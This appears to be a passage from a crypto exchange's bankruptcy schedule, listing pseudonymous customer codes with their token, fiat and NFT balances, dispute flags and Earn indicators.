| 07375253 | | CUSDT[1], DOGE[2628.51854932], NFT (548101235042945346/FTX - Off The Grid Miami #3001)[1], USD[10.00] | | |
| 07375254 | | ALGO[0], BAT[0], BTC[0], CUSDT[0], DAI[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], MATIC[0], SHIB[0], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07375256 | | BRZ[3], CUSDT[25], DOGE[224.16894772], ETH[.08705599], ETHW[.0860329], LTC[0], SOL[1.83582372], SUSHI[26.23727828], TRX[1178.68065579], USD[0.22] | Yes | |
| 07375257 | | BTC[0], USD[0.00], USDT[0] | | |
| 07375258 | | CUSDT[2], USD[0.00] | | |
| 07375259 | | USD[0.00] | | |
| 07375261 | | CUSDT[1], USD[0.01] | | |
| 07375262 | | DOGE[490.39198667], USD[0.00] | Yes | |
| 07375263 | | CUSDT[1], DOGE[1], USD[0.01] | Yes | |
| 07375264 | | USD[0.00] | | |
| 07375265 | | USD[10.00] | | |
| 07375266 | | BRZ[1], TRX[2], USD[0.54] | | |
| 07375267 | | USD[10.00] | | |
| 07375268 | | BRZ[1], CUSDT[3], SHIB[2], USD[219.09] | Yes | |
| 07375270 | | BTC[.0001694], DOGE[693.4549828], USD[0.00] | | |
| 07375271 | | USD[10.00] | | |
| 07375275 | | DOGE[123.80024844], USD[0.00] | | |
| 07375276 | | BRZ[1], CUSDT[2], GRT[1], TRX[4], USD[0.01] | | |
| 07375277 | | USD[10.00] | | |
| 07375278 | | DOGE[1], USD[-0.05] | | |
| 07375279 | | USD[10.00] | | |
| 07375280 | | BAT[1.0165555], DOGE[1], USD[0.00] | Yes | |
| 07375281 | | ETH[.00543128], ETHW[.00543128], TRX[1], USD[0.00] | | |
| 07375282 | | USD[10.00] | | |
| 07375286 | | CUSDT[1], DOGE[1.0005884], SHIB[39.06662257], TRX[1], USD[0.00] | Yes | |
| 07375287 | | USD[0.00] | | |
| 07375288 | | USD[10.00] | | |
| 07375290 | | CUSDT[2], DOGE[79.09981696], USD[0.00] | Yes | |
| 07375291 | | USD[0.63] | | |
| 07375292 | | USD[10.00] | | |
| 07375293 | | USD[10.00] | | |
| 07375295 | | CUSDT[1], NFT (420848339089025999/Hall of Fantasy League #137)[1], SHIB[812820.51282051], TRX[217.07494764], USD[0.00] | | |
| 07375296 | | BAT[1.00996311], BRZ[1], BTC[2.22724457], CUSDT[1], DOGE[5.01791415], GRT[4.10719955], LINK[1.05640434], TRX[6], USD[0.00] | Yes | |
| 07375297 | | USD[10.00] | | |
| 07375299 | | BRZ[1], CUSDT[3], TRX[2], USD[0.39], USDT[2] | | |
| 07375301 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07375302 | | SGD[13.02], USD[0.00] | | |
| 07375304 | | BTC[.0001731], USD[0.00] | | |
| 07375305 | | USD[10.00] | | |
| 07375307 | | DOGE[137.45494742], USD[0.00] | | |
| 07375308 | | DOGE[139.51504013], USD[0.00] | | |
| 07375310 | | USD[10.00] | | |
| 07375311 | | BAT[1], BRZ[2], CUSDT[11], DOGE[1.20171139], TRX[1], USD[0.21] | | |
| 07375312 | | TRX[191.19618066], USD[0.00] | | |
| 07375313 | | CUSDT[4], DOGE[388.68895058], NFT (540711325520288374/ALPHA:RONIN #821)[1], SOL[.01768389], USD[0.00], USDT[0] | Yes | |
| 07375314 | | USD[10.00] | | |
| 07375315 | | USD[10.00] | | |
| 07375317 | | DOGE[26.35037572], USD[0.00] | | |
| 07375319 | | CUSDT[1], DOGE[312.90969625], TRX[1], USD[0.00] | | |
| 07375320 | | DOGE[122.09482983], USD[0.00] | | |
| 07375321 | | BAT[4.93915829], BTC[.0012121], CUSDT[668.30452341], DOGE[321.65853761], ETH[.02937755], ETHW[.02937755], GRT[1.12426077], LTC[.18512765], SHIB[2], SOL[1.11200895], SUSHI[16.527473111], TRX[700.50895324], USD[15.09] | | |
| 07375322 | | USD[10.00] | | |
| 07375324 | | DOGE[134.51507517], TRX[1], USD[0.00] | | |
| 07375325 | | USD[10.00] | | |
| 07375327 | | USD[10.00] | | |
| 07375328 | | USD[10.00] | | |
| 07375329 | | USD[0.85] | Yes | |
| 07375330 | | USD[0.00] | | |
| 07375332 | | USD[10.00] | | |
| 07375333 | | USD[11.09] | Yes | |
| 07375334 | | BRZ[1], ETH[0], ETHW[0], TRX[2006.82470597], USD[0.00], USDT[0] | Yes | |
| 07375336 | | BRZ[1], CUSDT[4], TRX[1], USD[0.00] | | |
| 07375337 | | USD[10.00] | | |
| 07375339 | | BRZ[0], USD[0.01] | | |
| 07375340 | | USD[15.35] | Yes | |
| 07375341 | | USD[10.00] | | |
| 07375342 | | DOGE[ 9], SUSHI[.2925], USD[2.24], USDT[0] | | |
| 07375343 | | BTC[.00010721], DOGE[70.53029755], USD[0.00] | | |
| 07375345 | | DOGE[151.74826057], USD[0.00] | | |
| 07375347 | | USD[10.00] | | |
| 07375348 | | USD[10.00] | | |
| 07375349 | | CUSDT[1], DOGE[1.00000239], USD[0.00] | | |
| 07375350 | | USD[10.00] | | |
| 07375351 | | CUSDT[1], DOGE[13.7067825], TRX[36.97143211], USD[0.00] | Yes | |
| 07375352 | | USD[10.00] | | |
| 07375353 | | USD[10.00] | | |
| 07375354 | | USD[10.00] | | |
| 07375355 | | USD[10.00] | | |
| 07375356 | | BRZ[2], CUSDT[2], DOGE[2902.77777898], TRX[1], USD[0.00], USDT[0] | | |
| 07375357 | | USD[10.00] | | |
| 07375358 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07375359 | | DOGE[151.29062449], USD[0.00] | | |
| 07375361 | | BTC[0.01291657], CUSDT[5], ETH[0.42375011], ETHW[0.42357209], MATIC[438.79260554], NFT (315373216896030014/Barcelona Ticket Stub #1658)[1], NFT (455133585559210955/Imola Ticket Stub #296)[1], TRX[2], USD[0.01], USDT[0.00000847], YFI[0] | Yes | |
| 07375363 | | DOGE[30.15094982], USD[0.00] | | |
| 07375364 | | BRZ[1], CUSDT[3], DOGE[2095.18530223], USD[0.01] | | |
| 07375365 | | DOGE[2], KSHIB[166.44787587], USD[0.08] | | |
| 07375366 | | DOGE[.04288395], TRX[.0000544], USD[8.46] | | |
| 07375367 | | USD[10.00] | | |
| 07375368 | | BCH[0], BTC[0], DOGE[0], LTC[0], SHIB[155396.88172827], SOL[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07375369 | | CUSDT[1], DOGE[9327.06673937], USD[0.00] | | |
| 07375370 | | USD[10.00] | | |
| 07375371 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07375372 | | BRZ[2], CUSDT[1], DOGE[2172.3383593], ETH[.77969448], ETHW[.77936696], GRT[195.64985503], NFT (290083853636265766/Guard #1)[1], NFT (358462357261991267/SOLYETIS #6647)[1], NFT (377958660763876915/Solninjas #5741)[1], NFT (408296382788978866/Mad Lions Series #9)[1], NFT (445359263509043441/ Skull #2)[1], NFT (529984413476555633/Infidel #1)[1], SHIB[29640161.04903276], SOL[33.54600298], TRX[1492.43428537], USD[3.72], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07375374 | | BRZ[1], CUSDT[2], DOGE[1], GRT[15.46764702], TRX[1], USD[0.01] | Yes | |
| 07375375 | | USD[10.00] | | |
| 07375376 | | USD[10.00] | | |
| 07375377 | | BRZ[1], CUSDT[2], SHIB[89581.85532694], USD[0.00], USDT[0] | Yes | |
| 07375378 | | DOGE[0], USD[0.00] | | |
| 07375379 | | CUSDT[1], DOGE[132.35681607], TRX[1], USD[0.23] | | |
| 07375380 | | CUSDT[1.5181334], DOGE[1037.62645944], ETH[.00005404], ETHW[.00005404], USD[0.00] | | |
| 07375381 | | USD[10.00] | | |
| 07375382 | | USD[10.00] | | |
| 07375383 | | USD[10.00] | | |
| 07375384 | | DOGE[315.8059217], USD[0.00] | | |
| 07375386 | | CUSDT[2], USD[0.01] | Yes | |
| 07375387 | | USD[10.00] | | |
| 07375388 | | BAT[.00004704], BRZ[1], CUSDT[4], DOGE[2.00004655], ETH[0.00000009], ETHW[0.00000009], NFT (528856323351460031/ApexDucks #6426)[1], SHIB[1], SOL[.00000083], TRX[1], USD[0.01] | Yes | |
| 07375389 | | USD[10.00] | | |
| 07375390 | | TRX[160.6529273], USD[0.00] | | |
| 07375391 | | BAT[2], BRZ[8], CUSDT[16], DOGE[.80005958], GRT[1], SOL[.02668576], TRX[8.06515673], USD[0.71], USDT[0.78875057] | | |
| 07375392 | | BTC[0.00068087], DOGE[0], ETH[.0000006], ETHW[.0000006], USD[0.00] | Yes | |
| 07375393 | | DOGE[531.13712339], USD[10.41] | | |
| 07375394 | | CUSDT[1], GRT[.00009785], TRX[1.35673932], USD[0.00] | Yes | |
| 07375395 | | USD[10.00] | | |
| 07375396 | | DOGE[0], TRX[1], USD[0.01] | Yes | |
| 07375397 | | USD[10.00] | | |
| 07375398 | | USD[0.01] | | |
| 07375399 | | USD[9.70] | | |
| 07375400 | | BRZ[1.00000008], CUSDT[3], DOGE[0], TRX[0], USD[0.01] | | |
| 07375401 | | CUSDT[3], DOGE[1980.12573929], SHIB[181656.49804395], TRX[1], USD[0.00] | | |
| 07375402 | | USD[0.02] | | |
| 07375403 | | USD[10.00] | | |
| 07375405 | | USD[10.00] | | |
| 07375406 | | USD[10.00] | | |
| 07375407 | | CUSDT[2], DOGE[25.94507520], LTC[.19791117], USD[0.00] | Yes | |
| 07375408 | | USD[0.00] | | |
| 07375409 | | BRZ[1], CUSDT[5], SOL[0], TRX[1], USD[0.00] | Yes | |
| 07375410 | | DOGE[1343.54322097], USD[0.00] | Yes | |
| 07375411 | | USD[10.00] | | |
| 07375412 | | USD[10.00] | | |
| 07375413 | | BTC[0], CUSDT[2], GRT[16.74676893], PAXG[0], USD[0.00] | | |
| 07375414 | | USD[10.00] | | |
| 07375416 | | USD[10.00] | | |
| 07375417 | | BTC[0], ETH[.00000214], USD[1605.00], USDT[0.00000001] | | |
| 07375418 | | USD[10.00] | | |
| 07375419 | | USD[0.59] | | |
| 07375420 | | BTC[.00004567], DOGE[8.11940162], ETH[.00031969], ETHW[.00031969], MKR[.00066515], USD[2.19], USDT[.99447998] | Yes | |
| 07375421 | | BAT[1.85773195], BTC[.00000913], CUSDT[7], DOGE[9.75478208], ETH[.00017731], ETHW[.00017731], GRT[3.13599812], KSHIB[72.28943533], MATIC[3.09514016], MKR[.00008116], SHIB[116970.52862848], SOL[.02111985], TRX[52.77031481], USD[0.04] | Yes | |
| 07375422 | | USD[10.00] | | |
| 07375423 | | BTC[0.00000838], CUSDT[2], DOGE[1.00046078], TRX[1], USD[0.79] | Yes | |
| 07375424 | | ETH[.00281771], ETHW[.00281771], GRT[1.83196343], USD[0.00] | | |
| 07375425 | | BRZ[2], CUSDT[3], DOGE[5618.1055873], TRX[1], USD[0.00], USDT[1.10835423] | Yes | |
| 07375426 | | BRZ[1], CUSDT[1.00285893], DOGE[.64186272], SHIB[.19296132], TRX[.00922222], USD[0.84] | | |
| 07375427 | | DOGE[32.24520327], USD[0.02] | | |
| 07375428 | | USD[10.00] | | |
| 07375429 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07375430 | | USD[10.00] | | |
| 07375432 | | TRX[199.0360287], USD[0.00] | | |
| 07375433 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07375434 | | USD[10.00] | | |
| 07375435 | | TRX[.000001], USD[1.99], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07375436 | | USD[10.00] | | |
| 07375437 | | USD[10.96] | Yes | |
| 07375438 | | BTC[.00041209], CUSDT[5], DOGE[208.77608956], TRX[1], USD[0.00] | | |
| 07375439 | | USD[10.00] | | |
| 07375440 | | USD[10.00] | | |
| 07375441 | | CUSDT[5], USD[0.00] | | |
| 07375442 | | TRX[1], USD[0.01] | | |
| 07375443 | | USD[0.00] | Yes | |
| 07375444 | | USD[10.00] | | |
| 07375445 | | CUSDT[2], USD[0.00] | | |
| 07375446 | | TRX[1], USD[10.00], USDT[1] | | |
| 07375447 | | USD[11.02] | Yes | |
| 07375448 | | BCH[0], SHIB[265364.62840388], USD[0.00] | Yes | |
| 07375449 | | CUSDT[5], DOGE[34.67916977], SOL[0.51646702], USD[0.00] | | |
| 07375450 | | USD[10.00] | | |
| 07375451 | | BTC[.00021005], USD[0.00] | | |
| 07375452 | | USD[0.38] | Yes | |
| 07375453 | | USD[10.00] | | |
| 07375454 | | DOGE[3048.43283854], USD[0.02] | | |
| 07375455 | | SHIB[5], USD[0.01], USDT[0] | | |
| 07375456 | | USD[0.00] | | |
| 07375457 | | BTC[.00002524], DOGE[1], USD[44.32] | Yes | |
| 07375458 | | DOGE[119.41013316], SOL[.00048237], USD[0.00] | | |
| 07375459 | | ALGO[0], BAT[0], DOGE[0], ETHW[0.00023112], LINK[0], LTC[0], MATIC[0], SHIB[0], SOL[0], USD[0.04], USDT[0] | | |
| 07375460 | | DOGE[2.14224882], TRX[2], USD[0.00] | Yes | |
| 07375461 | | USD[10.00] | | |
| 07375462 | | GRT[462], USD[0.06] | | |
| 07375463 | | BAT[17.75960126], CUSDT[6], DOGE[17418.28223712], GRT[10.21783713], LINK[.66186607], MATIC[12.603637], SUSHI[1.0391925], TRX[2533.89878585], USD[0.00] | | |
| 07375464 | | USD[10.00] | | |
| 07375465 | | USD[10.00] | | |
| 07375466 | | CUSDT[2], DOGE[460.90349586], USD[0.00] | | |
| 07375467 | | CUSDT[1], TRX[168.23472647], USD[0.00] | | |
| 07375468 | | USD[10.00] | | |
| 07375469 | | USD[10.00] | | |
| 07375470 | | USD[10.00] | | |
| 07375471 | | CUSDT[1], DOGE[1763.04064041], SOL[6.8261079], USD[0.00] | | |
| 07375472 | | BTC[.00113345], CUSDT[3], DOGE[2], USD[0.00] | | |
| 07375473 | | DOGE[.00170521], USD[0.00] | Yes | |
| 07375474 | | BTC[0], DOGE[0], LTC[0], USD[0.00] | | |
| 07375475 | | BRZ[1], DOGE[51.95777352], USD[0.00] | | |
| 07375476 | | USD[10.00] | | |
| 07375477 | | USD[10.00] | | |
| 07375478 | | CUSDT[2], GRT[7.02932469], USD[0.00] | Yes | |
| 07375479 | | USD[10.00] | | |
| 07375481 | | BTC[0.00009462], MATIC[6.99404268], SOL[0.47278681], TRX[.000002], USDT[0.70223471] | | |
| 07375483 | | USD[10.00] | | |
| 07375485 | | BAT[65.01779691], BCH[.08889582], BRZ[3], BTC[.35673099], CUSDT[37], DOGE[5501.33518272], ETH[.50343998], ETHW[.50322838], GRT[66.15214469], LINK[2.32051302], LTC[.30540835], SOL[7.80409021], SUSHI[7.35381376], TRX[17129.420319], UNI[3.30820399], USD[16.01], YFI[.00155211] | Yes | |
| 07375486 | | DOGE[23.82051641], USD[0.00] | | |
| 07375487 | | DOGE[1], ETH[0], ETHW[0], USD[0.00] | | |
| 07375489 | | USD[10.00] | | |
| 07375490 | | DOGE[1464.26409025], USD[0.00] | | |
| 07375491 | | USD[10.00] | | |
| 07375492 | | DOGE[1.00239447], USD[0.00] | | |
| 07375493 | | USD[10.00] | | |
| 07375494 | | DOGE[30.65095009], USD[0.00] | | |
| 07375495 | | BRZ[2], DOGE[10050.72620611], ETH[4.20314612], ETHW[4.20314612], TRX[1], USD[0.00], USDT[1] | | |
| 07375496 | | USD[10.00] | | |
| 07375497 | | BRZ[1], CUSDT[1], TRX[3], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07375498 | | BAT[1], BRZ[1], CUSDT[4], DOGE[1.40946589], TRX[8], USD[0.66] | | |
| 07375499 | | BRZ[59.49745742], DOGE[1], USD[0.43] | | |
| 07375500 | | GRT[7.3746207], USD[0.00] | | |
| 07375501 | | USD[10.00] | | |
| 07375502 | | USD[10.00] | | |
| 07375503 | | BRZ[0], BTC[0], DOGE[0], USD[0.01], USDT[0.00000001] | Yes | |
| 07375504 | | USD[10.00] | | |
| 07375506 | | BRZ[1], CUSDT[1], TRX[1], USD[0.00] | | |
| 07375507 | | CUSDT[3], TRX[.02732919], USD[0.00] | | |
| 07375508 | | USD[0.00] | | |
| 07375509 | | USD[10.00] | | |
| 07375511 | | BRZ[16.74774155], CUSDT[2], DOGE[666.5550602], LTC[.01036226], SOL[.1098369], TRX[19.05586375], USD[0.01], USDT[0], YFI[.00005814] | | |
| 07375512 | | USD[10.00] | | |
| 07375513 | | DOGE[0], SHIB[1.49028536], TRX[0], USD[0.00] | Yes | |
| 07375514 | | TRX[203.19693806], USD[5.00] | | |
| 07375515 | | CUSDT[22.04355511], DOGE[.00015593], TRX[2.00000735], USD[0.00] | | |
| 07375516 | | USD[10.00] | | |
| 07375517 | | BRZ[1], DOGE[2299.14722165], TRX[2], USD[0.00] | | |
| 07375518 | | USD[10.00] | | |
| 07375519 | | CUSDT[1], USD[0.00] | | |
| 07375520 | | DOGE[1], ETH[.01114035], ETHW[.01114035], USD[0.00] | | |
| 07375522 | | DOGE[189.49457249], USD[0.00] | | |
| 07375523 | | USD[10.00] | | |
| 07375524 | | CUSDT[3], ETH[.01377339], ETHW[.01360263], TRX[1], USD[0.94] | Yes | |
| 07375525 | | ETH[.00544983], ETHW[.00544983], TRX[1], USD[0.00] | | |
| 07375526 | | BRZ[1], BTC[.0197937], CUSDT[6], DOGE[2518.0959693], TRX[2], USD[0.00], USDT[2.22155197] | Yes | |
| 07375527 | | USD[10.00] | | |
| 07375528 | | USD[10.00] | | |
| 07375529 | | SHIB[1877.48705096], USD[0.00], USDT[0] | Yes | |
| 07375530 | | USD[10.00] | | |
| 07375532 | | USD[10.00] | | |
| 07375534 | | DOGE[0], USD[34.29], USDT[0] | | |
| 07375535 | | ETH[0.90417781], ETHW[0.90379801], MATIC[0], SHIB[4414232.50612109], SOL[0], TRX[1], USD[0.00] | Yes | |
| 07375536 | | USD[10.00] | | |
| 07375537 | | CUSDT[1], DOGE[29.01935222], USD[0.00] | | |
| 07375539 | | USD[10.00] | | |
| 07375540 | | BRZ[0.00000002], DAI[0], ETH[0], GRT[0], USD[0.00], USDT[0.00000001] | | |
| 07375541 | | CUSDT[5], USD[0.67] | | |
| 07375542 | | DOGE[1], GRT[0.00001475], USD[10.00] | | |
| 07375543 | | LTC[.002356], USD[0.00] | | |
| 07375544 | | BRZ[1], USD[0.01] | | |
| 07375545 | | BRZ[1], CUSDT[2], DOGE[687.19740125], TRX[1], USD[0.00] | | |
| 07375547 | | USD[10.00] | | |
| 07375548 | | DOGE[123.4061022], USD[0.00] | | |
| 07375549 | | BTC[0], CUSDT[1], DOGE[0.19379323], ETH[0], LTC[0], USD[0.00], YFI[0.00122199] | Yes | |
| 07375550 | | USD[10.00] | | |
| 07375551 | | BAT[2.10509685], BRZ[3], BTC[.01909374], CUSDT[8], ETH[.28297779], ETHW[.28278171], GRT[1.00367791], TRX[3], USD[0.00], USDT[1.09608406] | Yes | |
| 07375552 | | USD[10.00] | | |
| 07375554 | | BAT[1], BRZ[5], CUSDT[7], DOGE[3], NFT (345508728527622655/CryptoFabula #167)[1], NFT (384153563510725807/CyberPunk Skull #4)[1], NFT (428527100033348961/1964 Chevy Impala #3 of 3)[1], NFT (429728508868022815/1926 Indian Motorcycles Prince #2 of 3)[1], TRX[1], USD[0.02], USDT[1.02099343] | Yes | |
| 07375556 | | USD[10.00] | | |
| 07375557 | | DOGE[2], USD[10.00], USDT[0] | | |
| 07375558 | | USD[11.03] | Yes | |
| 07375560 | | USD[10.00] | | |
| 07375561 | | USD[10.00] | | |
| 07375562 | | USD[0.00] | Yes | |
| 07375563 | | CUSDT[1], DOGE[243.90837674], TRX[1], USD[0.00] | | |
| 07375566 | | USD[10.00] | | |
| 07375568 | | AVAX[.03610191], BAT[4.24932568], BRZ[3], DOGE[3.82343322], ETHW[14.18890615], GRT[.75246152], KSHIB[100], TRX[17.15157528], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07375569 | | USD[10.00] | | |
| 07375570 | | BAT[1], BTC[.00191987], CUSDT[3], DOGE[3481.32608863], ETH[.04747044], ETHW[.04747044], USD[0.00] | | |
| 07375572 | | DOGE[0], TRX[0], USD[0.00] | | |
| 07375573 | | USD[10.00] | | |
| 07375574 | | USD[10.00] | | |
| 07375575 | | BRZ[2], CUSDT[31], DOGE[931.65518181], TRX[1], USD[0.00] | | |
| 07375576 | | BCH[0], BRZ[0], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], MATIC[0], NFT (2946482431328028531Miss Purrfect)[1], NFT (2953614277062566031Belgium Ticket Stub #96)[1], NFT (2957021699353588161Belgium Ticket Stub #94)[1], NFT (2992419817935767871Nobu Sensei #451)[1], NFT (3041998224194132321Belgium Ticket Stub #100)[1], NFT (3095343518245035511CryptoKitty #545530)[1], NFT (3159587458715886831 3D CATPUNK #72)[1], NFT (3170680208998733721Bahrain Ticket Stub #18)[1], NFT (3187949485153205421Barcelona Ticket Stub #153)[1], NFT (3266014073940848331 3D CATPUNK #8074)[1], NFT (3305330997370919161Belgium Ticket Stub #65)[1], NFT (3355325092080898681Hungary Ticket Stub #38)[1], NFT (3496827745926505911Astral Apes #1653)[1], NFT (3535988707017878481Belgium Ticket Stub #99)[1], NFT (3582486599548903691 3D SOLDIER #599)[1], NFT (3610454909943045561Saudi Arabia Ticket Stub #950)[1], NFT (3627448977144380301Hungary Ticket Stub #197)[1], NFT (3678333690805263111Astral Apes #2608)[1], NFT (3736760653885408931 3D CATPUNK #7632)[1], NFT (3843257712252675741Saudi Arabia Ticket Stub #106)[1], NFT (3857099727152994431Saudi Arabia Ticket Stub #39)[1], NFT (3971212726421289581ApexDucks #1881)[1], NFT (4020859772525991591Imola Ticket Stub #77)[1], NFT (4070748137232658271 3D CATPUNK #6006)[1], NFT (4086408597112862061Saudi Arabia Ticket Stub #833)[1], NFT (4231970163032802371Belgium Ticket Stub #98)[1], NFT (4309105504768751921Belgium Ticket Stub #95)[1], NFT (4417593480199308101Hungary Ticket Stub #33)[1], NFT (4422406019226623001Bahrain Ticket Stub #65)[1], NFT (4462770794408895171ApexDucks Halloween #599)[1], NFT (4494754941970156621Astral Apes #73)[1], NFT (4592656562464691290/3D CATPUNK #2168)[1], NFT (4647483705203468711 3D CATPUNK #334)[1], NFT (4687322794611487751 3D CATPUNK #3149)[1], NFT (4703634065550544421Saudi Arabia Ticket Stub #86)[1], NFT (4763508589333030991Astral Apes #747)[1], NFT (4784264079684642201Belgium Ticket Stub #92)[1], NFT (4778387714742907331Astral Apes #1081)[1], NFT (4838236585714281451Imola Ticket Stub #55)[1], NFT (4886444779432408591Saudi Arabia Ticket Stub #58)[1], NFT (4929435385086332261Belgium Ticket Stub #102)[1], NFT (4969261474542615821Belgium Ticket Stub #93)[1], NFT (4969875435559186881Super Saiyan Goku)[1], NFT (5017099705596487551Hungary Ticket Stub #263)[1], NFT (5122784594863688711Bahrain Ticket Stub #97)[1], NFT (5243968633335742581Astral Apes #680)[1], NFT (5250328445100170091Fancy Frenchies #6700)[1], NFT (5375813287532175801Australia Ticket Stub #112)[1], NFT (5378506860806686881Belgium Ticket Stub #103)[1], NFT (5428998358270400091 3D CATPUNK #2206)[1], NFT (5531446989810331081ApexDucks #5886)[1], NFT (5636450506111532311Saudi Arabia Ticket Stub #385)[1], NFT (5666912929939434748/Belgium Ticket Stub #97)[1], NFT (5693042154224327211Belgium Ticket Stub #97)[1], NFT (5718525344839995821Barcelona Ticket Stub #217)[1], NFT (5734924033987758664/Miss Purrfect)[1], SOL[0.00109774], SUSHI[0], TRX[0.00000188], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07375577 | | USD[10.00] | | |
| 07375578 | | USD[10.00] | | |
| 07375579 | | DOGE[0], SUSHI[0], USD[0.00] | | |
| 07375580 | | USD[10.00] | | |
| 07375581 | | USD[10.00] | | |
| 07375582 | | USD[10.00] | | |
| 07375583 | | DOGE[3], ETH[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07375585 | | USD[10.00] | | |
| 07375586 | | USD[0.58] | | |
| 07375587 | | DOGE[0], USD[0.00], USDT[0] | | |
| 07375588 | | USD[10.00] | | |
| 07375589 | | USD[10.00] | | |
| 07375590 | | CUSDT[2], DOGE[912.67812688], LTC[.10075486], NFT (345247234281915408/Pug Love #3)[1], SOL[.15752483], TRX[204.51804912], USD[0.00] | | |
| 07375591 | | USD[10.00] | | |
| 07375592 | | USD[0.00], USDT[9.93910686] | | |
| 07375593 | | DOGE[28.45375198], USD[0.00] | | |
| 07375596 | | DOGE[.00201722], SHIB[1213425.7569959], TRX[1], USD[0.00] | Yes | |
| 07375597 | | DOGE[0.00026763], USD[0.00] | | |
| 07375599 | | BRZ[1], CUSDT[1], ETH[0], USD[0.01] | | |
| 07375601 | | USD[0.00] | | |
| 07375602 | | USD[10.00] | | |
| 07375603 | | DOGE[1], USD[0.04] | | |
| 07375604 | | USD[0.00] | | |
| 07375605 | | ETH[0], ETHW[0] | | |
| 07375606 | | CUSDT[1], DOGE[12.42076611], TRX[1], USD[0.81] | | |
| 07375607 | | USD[10.00] | | |
| 07375608 | | BRZ[2], DOGE[3], ETH[.000002], ETHW[.21933147], SHIB[20], SOL[.00011657], TRX[12], USD[0.00], USDT[1.02523541] | Yes | |
| 07375609 | | USD[10.00] | | |
| 07375611 | | DOGE[170.24322438], SHIB[263920.670217], TRX[1], USD[0.00] | | |
| 07375612 | | BAT[1], CUSDT[16], DOGE[101.15970479], ETH[.02711106], ETHW[.02711106], TRX[4], USD[0.00] | | |
| 07375613 | | BRZ[1], TRX[1], USD[2678.26] | | |
| 07375614 | | CUSDT[4], DOGE[.05973169], USD[0.90] | | |
| 07375615 | | USD[10.00] | | |
| 07375616 | | DOGE[128.4748553], USD[0.00] | | |
| 07375617 | | USD[0.00] | | |
| 07375619 | | USD[10.00] | | |
| 07375620 | | USD[10.00] | | |
| 07375621 | | USD[0.01] | | |
| 07375622 | | ETH[.00568039], ETHW[.00568039], USD[0.00] | | |
| 07375624 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07375625 | | USD[10.00] | | |
| 07375626 | | DOGE[33.09800945], USD[2.22] | | |
| 07375627 | | USD[10.00] | | |
| 07375628 | | USD[10.00] | | |
| 07375629 | | BCH[0], BTC[0], DOGE[138.19273673], USD[0.00] | | |
| 07375630 | | CUSDT[25.47518133], SHIB[4], USD[0.00] | | |
| 07375631 | | USD[0.00] | | |
| 07375632 | | DOGE[122.4995394], USD[0.00] | | |
| 07375633 | | USD[10.00] | | |
| 07375634 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07375635 | | USD[10.00] | | |
| 07375637 | | USD[10.00] | | |
| 07375640 | | USD[10.00] | | |
| 07375641 | | USD[10.00] | | |
| 07375643 | | USD[10.00] | | |
| 07375644 | | USD[0.00] | | |
| 07375645 | | TRX[218.99549394], USD[0.00] | | |
| 07375647 | | USD[0.00] | | |
| 07375649 | | USD[10.00] | | |
| 07375650 | | USD[10.00] | | |
| 07375651 | | USD[10.00] | | |
| 07375652 | | BRZ[1], CUSDT[3], DOGE[1], TRX[3], USD[0.00] | | |
| 07375653 | | TRX[185.15583455], USD[0.00] | | |
| 07375654 | | USD[10.00] | | |
| 07375656 | | BAT[1.01655549], BRZ[2], CUSDT[10], DOGE[12.54380156], ETHW[1.03101279], GRT[1], SHIB[.00000003], USD[29.78], USDT[1.02543197] | Yes | |
| 07375657 | | CUSDT[4], TRX[4], USD[0.00] | | |
| 07375658 | | BCH[.00066986], BRZ[1], DOGE[2.67647947], TRX[2], USD[0.00], USDT[0.00000001] | | |
| 07375659 | | BCH[0.03853746], BRZ[1], BTC[0], CUSDT[5], DOGE[2], ETH[0.01161794], ETHW[0.01147010], USD[0.00] | Yes | |
| 07375660 | | USD[10.00] | | |
| 07375661 | | BAT[18.37931008], USD[0.00] | | |
| 07375662 | | USD[0.01], USDT[0] | Yes | |
| 07375664 | | USD[10.00] | | |
| 07375665 | | USD[0.00] | | |
| 07375666 | | BAT[39.87659177], BTC[.00025278], CUSDT[1], DOGE[598.50054867], GRT[20.95545891], TRX[257.16354705], USD[0.00] | | |
| 07375667 | | CUSDT[2], DOGE[94.22434044], TRX[9352.06212572], UNI[0], USD[0.00] | Yes | |
| 07375668 | | BTC[0], LTC[0.00044112], MATIC[0], USD[0.00] | Yes | |
| 07375669 | | USD[0.01] | | |
| 07375670 | Contingent, Disputed | DOGE[121.37648704], USD[0.00] | | |
| 07375671 | | SOL[.0999], USD[85.23] | | |
| 07375673 | | USD[10.95] | Yes | |
| 07375674 | | USD[10.00] | | |
| 07375675 | | USD[10.00] | | |
| 07375677 | | BTC[.00514512], CUSDT[5], DOGE[598.27519032], TRX[1], USD[0.01] | | |
| 07375678 | | USD[10.00] | | |
